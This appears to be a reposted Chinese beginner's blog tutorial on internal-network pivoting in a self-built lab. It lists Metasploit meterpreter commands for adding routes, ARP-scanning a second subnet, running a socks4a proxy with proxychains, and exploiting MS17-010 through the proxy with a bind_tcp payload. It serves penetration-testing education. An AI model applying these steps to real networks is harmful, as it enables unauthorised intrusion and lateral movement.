前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >初学内网渗透之代理跳板攻击

初学内网渗透之代理跳板攻击

作者头像
TRY博客-简单的网络技术
发布2022-09-08 11:50:43
8050
发布2022-09-08 11:50:43
举报

至少我们曾经在一起过。

来自:一言

var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();

前言

经过前面的学习操作,我们已经 拿到一台服务器的权限了,然后通过查看靶机的网络信息,发现是双网卡,就是说是两层网络,通过kali是不能直接与另外一台服务器通信的,所以我们需要用这个靶机做代理跳板去攻击第二层网络的靶机。[aru_34]

kali:192.168.137.138

Win2012靶机:192.168.137.129    网卡二:1.1.2.2

靶机二:未知

相关命令:

  • run get_local_subnets //获取网段
  • run autoroute -s 192.168.250.1/24 //添加路由
  • run autoroute -p //查看路由
  • run autoroute -d -s 172.2.175.0 //删除网段
  • run post/windows/gather/arp_scanner RHOSTS=1.1.2.0/24 //扫描该网段下存活的主机

实战演练

  • 1.在meterpreter下先查看路由表
    • 命令:route
    初学内网渗透之代理跳板攻击
    初学内网渗透之代理跳板攻击
  • 2.然后手动添加路由
    • 命令:run autoroute -s 1.1.2.0/24
    • (也可以用 run post/multi/manage/autoroute  自动添加路由)
    初学内网渗透之代理跳板攻击
    初学内网渗透之代理跳板攻击
    • (添加成功)[aru_41]
  • 3.然后查看路由表信息,和扫描该网段下的主机
    • 查看已经添加的路由:run autoroute -p
    初学内网渗透之代理跳板攻击
    初学内网渗透之代理跳板攻击
    • 扫描该网段下的主机:run post/windows/gather/arp_scanner RHOSTS=1.1.2.0/24
    初学内网渗透之代理跳板攻击
    初学内网渗透之代理跳板攻击
  • 4.使用socket代理
    • 先background把session挂在后台
    • 命令:use auxiliary/server/socks4a
    • (用set命令修改参数,如果端口被占用,可以改别的)
    初学内网渗透之代理跳板攻击
    初学内网渗透之代理跳板攻击
    • 修改好后用run运行(成功运行)
    初学内网渗透之代理跳板攻击
    初学内网渗透之代理跳板攻击
    • 然后复制一个新会话,修改proxychains的配置文件
      • vim /etc/proxychains.conf(在配置文件最后修改)
    初学内网渗透之代理跳板攻击
    初学内网渗透之代理跳板攻击
    • 最后测试代理是否成功
      • cp /usr/lib/proxychains3/proxyresolv /usr/bin/
      • proxyresolv 1.1.2.1
      初学内网渗透之代理跳板攻击
      初学内网渗透之代理跳板攻击
      • 代理配置成功![aru_31]
  • 5.最后利用代理打开msf进行跳板攻击
    • 启动命令:proxychains msfconsole
    • 使用ms17-010漏洞(因为是事先准备好的靶机,所以知道存在什么漏洞,不知道的情况下,大家只有去扫了)
    • 注意:因为这里我们是用的代理去进行攻击的,所以payload需要设置成bind的,如:windows/x86/meterpreter/bind_tcp
    • 设置好相关参数直接攻击就可以了。
    初学内网渗透之代理跳板攻击
    初学内网渗透之代理跳板攻击
    • (通过代理攻击成功,已经拿到1.1.2.1的权限[aru_23])

总结

自己胡乱搭建的内网环境,中间也出现了一些问题,不过还算是成功了吧,写的比较乱,如果发现二层网络里还有其他网络的话就需要进行多层跳板代理,ip太多,容易记错。大佬们笑笑就好了[aru_70]

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2019-12-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 至少我们曾经在一起过。
    • 前言
      • 实战演练
        • 总结
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档